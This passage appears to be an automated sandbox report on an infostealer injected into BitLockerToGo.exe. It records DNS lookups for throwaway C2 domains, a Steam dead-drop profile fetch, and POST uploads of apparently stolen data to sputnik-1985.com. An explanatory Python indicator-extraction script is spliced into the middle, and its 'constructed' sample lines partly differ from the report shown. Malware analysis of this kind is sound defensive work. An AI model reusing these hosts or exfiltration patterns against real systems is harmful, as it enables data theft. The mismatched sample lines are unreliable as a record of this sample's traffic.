Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=IBNC1KXRCOYG; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1217; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=G1ZN91Z2ZW; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1079; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 121; Host: sputnik-1985.com
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampower equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampower equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ed.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ed.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9cf190a5d991b4bebe33d12e; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:34:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.0Z' equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr^Z equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.youtube.com/ httjT equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com~T equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ttps://www.youtube.com h7Z: equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: enterwahsh.biz
Source: global traffic | DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic | DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic | DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic | DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic | DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic | DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic | DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic | DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: 53.210.109.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sputnik-1985.com
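The network lines above are the raw material for an indicator list: a burst of NXDOMAIN answers for throwaway .lat/.biz names, one Steam profile fetch, then POST /api uploads to the single host that did resolve. The following Python is an added example, not Joe Sandbox's code and not part of the sample, that parses constructed copies of a few of those lines (kept in the raw report's fused header layout) into typed events and derives the findings an analyst would record: dead candidate C2 domains, the SteamID fetched, multipart bytes uploaded per host, and the JA3 alert destinations. The "dead-drop resolver" wording for the Steam fetch reflects public reporting that LummaC obtains its C2 from a Steam profile name; the regexes, thresholds and function names are the example's own.

```python
"""Extract network indicators from Joe Sandbox "Source | Description" lines.

Added example; not Joe Sandbox code. SAMPLE_LINES is a constructed copy of a
few network lines from the report above, keeping the raw report's fused HTTP
header layout ("HTTP/1.1Connection: Keep-AliveUser-Agent: ...Host: ...").
"""
import re
from collections import Counter

SAMPLE_LINES = """\
Source: unknown | DNS traffic detected: query: enterwahsh.biz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: talkynicer.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: 198.187.3.20.in-addr.arpa reply code: Name error (3)
Source: unknown | DNS traffic detected: query: slipperyloo.lat reply code: Name error (3)
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49780 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49770 -> 104.102.49.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1HOV66FNDB7NHBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GR9J0UZM8CJ54HBX912User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15090Host: sputnik-1985.com
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
"""

# Joe Sandbox writes "replaycode"; cleaned copies say "reply code". Accept both.
NXDOMAIN_RE = re.compile(r"DNS traffic detected: query: (\S+) repl\w* ?code: Name error \(3\)")
# Request line, then the header run (fused or "; "-separated) up to end of line.
HTTP_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01];? ?(.*)$")
HOST_RE = re.compile(r"Host: (\S+)")
CLEN_RE = re.compile(r"Content-Length: (\d+)")
# Lazy match so a multipart boundary fused onto "User-Agent:" is not swallowed.
CTYPE_RE = re.compile(r"Content-Type: (.*?);? ?(?=User-Agent:)")
SURICATA_RE = re.compile(
    r"Suricata IDS: (\d+) - Severity (\d) - (.*?) : [\d.]+:\d+ -> ([\d.]+):(\d+)"
)


def parse_report(text):
    """Classify each report line into an nxdomain, http or alert event."""
    events = {"nxdomain": [], "http": [], "alerts": []}
    for line in text.splitlines():
        if m := NXDOMAIN_RE.search(line):
            events["nxdomain"].append(m.group(1))
        elif m := HTTP_RE.search(line):
            method, path, headers = m.groups()
            host, clen, ctype = (r.search(headers) for r in (HOST_RE, CLEN_RE, CTYPE_RE))
            events["http"].append({
                "method": method,
                "path": path,
                "host": host.group(1) if host else None,
                "length": int(clen.group(1)) if clen else 0,
                "content_type": ctype.group(1).strip() if ctype else "",
            })
        elif m := SURICATA_RE.search(line):
            sid, sev, msg, dst, dport = m.groups()
            events["alerts"].append({"sid": int(sid), "severity": int(sev),
                                     "msg": msg, "dst": dst, "dport": int(dport)})
    return events


def nxdomain_domains(events):
    """Forward lookups that got NXDOMAIN; reverse (PTR) lookups are dropped."""
    return [d for d in events["nxdomain"] if not d.endswith(".in-addr.arpa")]


def exfil_summary(events):
    """Bytes POSTed as multipart/form-data per Host: the stolen-data uploads."""
    totals = Counter()
    for e in events["http"]:
        if e["method"] == "POST" and e["content_type"].startswith("multipart/form-data"):
            totals[e["host"]] += e["length"]
    return dict(totals)


def steam_profile_ids(events):
    """SteamID64 values fetched from steamcommunity.com/profiles/<id>."""
    return [e["path"].rsplit("/", 1)[1] for e in events["http"]
            if e["host"] == "steamcommunity.com" and e["path"].startswith("/profiles/")]


def assess(events):
    """Findings an analyst would write up from the parsed events."""
    findings = []
    dead = nxdomain_domains(events)
    if len(dead) >= 3:  # threshold is this example's choice, not a Joe Sandbox rule
        findings.append(f"{len(dead)} candidate C2 domains returned NXDOMAIN: {', '.join(dead)}")
    for steam_id in steam_profile_ids(events):
        findings.append(f"Steam profile {steam_id} fetched (dead-drop resolver pattern)")
    for host, nbytes in sorted(exfil_summary(events).items()):
        findings.append(f"{nbytes} bytes uploaded as multipart/form-data to {host}")
    for sid, dst in sorted({(a["sid"], a["dst"]) for a in events["alerts"]}):
        findings.append(f"Suricata SID {sid} fired on TLS to {dst}")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_report(SAMPLE_LINES)):
        print(finding)
```

Feed it the report's full network section (with the Source column separated by " | ") to get the complete list. Successful lookups such as steamcommunity.com and sputnik-1985.com are deliberately not counted as NXDOMAIN, and the PTR queries for the sandbox's own resolver addresses are filtered out so that only forward-lookup failures, the signal of a domain-rotation C2 list, reach the findings.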
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steAT
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steamp
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowere
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.%T4
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.
Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamFT
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampownZ
Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.
Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
